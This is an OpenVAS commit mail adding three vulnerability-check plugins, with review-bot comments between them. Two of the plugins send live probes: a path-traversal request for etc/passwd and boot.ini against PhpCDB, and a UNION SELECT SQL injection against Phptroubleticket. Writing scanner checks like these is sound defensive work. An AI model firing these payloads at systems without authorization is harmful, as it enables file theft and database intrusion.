[Openvas-commits] r6897 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Thu Mar 4 12:28:08 CET 2010
Author: mime
Date: 2010-03-04 12:28:05 +0100 (Thu, 04 Mar 2010)
New Revision: 6897
Added:
trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl
trunk/openvas-plugins/scripts/gb_apache_38494.nasl
trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/ChangeLog 2010-03-04 11:28:05 UTC (rev 6897)
@@ -1,3 +1,10 @@
+2010-03-04 Michael Meyer <michael.meyer at intevation.de>
+
+ * scripts/gb_apache_38494.nasl,
+ scripts/gb_PhpCDB_38507.nasl,
+ scripts/gb_phptroubleticket_38486.nasl:
+ Added new plugins.
+
2010-03-04 Michael Wiegand <michael.wiegand at intevation.de>
* scripts/cpe_inventory.nasl: Set proto strings so they can be
Added: trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl 2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl 2010-03-04 11:28:05 UTC (rev 6897)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PhpCDB 'lang_global' Parameter Multiple Local File Include Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100516);
+ script_bugtraq_id(38507);
+ script_version ("1.0-$Revision$");
+
+ script_name("PhpCDB 'lang_global' Parameter Multiple Local File Include Vulnerabilities");
+
+desc = "Overview:
+PhpCDB is prone to multiple local file-include vulnerabilities because
+it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain
+potentially sensitive information and execute arbitrary local
+scripts in the context of the webserver process. This may allow
+the attacker to compromise the application and the computer; other
+attacks are also possible.
+
+PhpCDB 1.0 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/38507
+http://sourceforge.net/projects/phpcdb/
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if PhpCDB is prone to local file-include vulnerabilities");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/phpcdb",cgi_dirs());
+
+foreach dir (dirs) {
+ foreach file (make_list("etc/passwd", "boot.ini")) {
+
+ url = string(dir,"/firstvisit.php?lang_global=../../../../../../../../../",file,"%00");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern:"(root:.*:0:[01]:|\[boot loader\])", string: buf)) {
+
+ security_warning(port:port);
+ exit(0);
+
+ }
+ }
+}
+
+exit(0);
+
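Review bot: The `desc` block starting at `desc = "Overview:` has no `Solution:` section, while gb_apache_38494.nasl in this same commit does carry one; since this test runs as ACT_ATTACK against a live host, a hit should tell the operator what to do with it. Suggest inserting, between the affected-versions sentence and `References:`, a short section such as `Solution:` followed by `Please see the references for an updated release.` (or, if no fixed release was known when the plugin was written, a sentence saying so). The same omission applies to the `desc` block in gb_phptroubleticket_38486.nasl below.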
Property changes on: trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/gb_apache_38494.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_apache_38494.nasl 2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/scripts/gb_apache_38494.nasl 2010-03-04 11:28:05 UTC (rev 6897)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apache Multiple Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100514);
+ script_bugtraq_id(38494,38491);
+ script_cve_id("CVE-2010-0425","CVE-2010-0434","CVE-2010-0408");
+ script_version ("1.0-$Revision$");
+
+ script_name("Apache Multiple Security Vulnerabilities");
+
+desc = "Overview:
+Apache is prone to multiple vulnerabilities.
+
+These issues may lead to information disclosure or other attacks.
+
+Apache versions prior to 2.2.15-dev are affected.
+
+Solution:
+These issues have been addressed in Apache 2.2.15-dev. Apache 2.2.15
+including fixes will become available in the future as well. Please
+see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/38494
+http://httpd.apache.org/security/vulnerabilities_22.html
+http://httpd.apache.org/
+https://issues.apache.org/bugzilla/show_bug.cgi?id=48359
+http://svn.apache.org/viewvc?view=revision&revision=917870
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if installed Apache version is <= 2.2.14");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("secpod_apache_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+httpdPort = get_http_port(default:80);
+if(!httpdPort){
+ exit(0);
+}
+
+version = get_kb_item("www/" + httpdPort + "/Apache");
+
+if(version != NULL){
+ if(version_in_range(version:version, test_version: "2.2",test_version2:"2.2.14")){
+ security_warning(port: httpdPort);
+ exit(0);
+ }
+}
+
+exit(0);
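Review bot: The description says `Apache versions prior to 2.2.15-dev are affected.`, but the only check is `version_in_range(version:version, test_version: "2.2",test_version2:"2.2.14")`, which flags 2.2.0–2.2.14 and nothing older, and `script_summary` likewise says "<= 2.2.14"; the prose and the test disagree on whether 2.0.x/1.3.x hosts are in scope. Either narrow the sentence to `Apache 2.2.x versions prior to 2.2.15 are affected.` or extend the range, whichever the linked Apache advisory supports — I cannot tell from the hunk which is intended. Minor style point: this script guards the port with `if(!httpdPort)` whereas the two sibling scripts in this commit use `if(!get_port_state(port))exit(0);`; aligning on one form would make the three plugins read consistently.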
Property changes on: trunk/openvas-plugins/scripts/gb_apache_38494.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision
Added: trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl 2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl 2010-03-04 11:28:05 UTC (rev 6897)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Phptroubleticket 'vedi_faq.php' SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100515);
+ script_bugtraq_id(38486);
+ script_version ("1.0-$Revision$");
+
+ script_name("Phptroubleticket 'vedi_faq.php' SQL Injection Vulnerability");
+
+desc = "Overview:
+Phptroubleticket is prone to an SQL-injection vulnerability because it
+fails to sufficiently sanitize user-supplied data before using it in
+an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+Phptroubleticket 2.0 is vulnerable; other versions may also be
+affected.
+
+References:
+http://www.securityfocus.com/bid/38486
+http://www.phptroubleticket.org/downloads.html
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Phptroubleticket is prone to an SQL-injection vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/phptt","/phpticket","/ticket",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: "Powered by phptroubleticket", string: buf, icase: TRUE)) {
+
+ url = string(dir,"/vedi_faq.php?id=1%20union%20all%20select%201,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4%20from%20utenti");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req,bodyonly:FALSE);
+ if("OpenVAS-SQL-Injection-Test" >< buf) {
+ security_warning(port:port);
+ exit(0);
+ }
+ }
+}
+
+exit(0);
+
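Review bot: The second `http_keepalive_send_recv` call (the one following the `vedi_faq.php` request) has no NULL check before `"OpenVAS-SQL-Injection-Test" >< buf`, whereas the first request three lines earlier is guarded with `if( buf == NULL )continue;`. Whether `><` on a NULL `buf` is harmless presumably depends on the interpreter, but the explicit guard already used in this loop costs nothing and keeps a dropped connection from being treated as a negative result silently; suggest adding `if( buf == NULL )continue;` directly after that assignment. The `desc` block here also lacks the `Solution:` section noted on gb_PhpCDB_38507.nasl above.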
Property changes on: trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl
___________________________________________________________________
Name: svn:keywords
+ Id Revision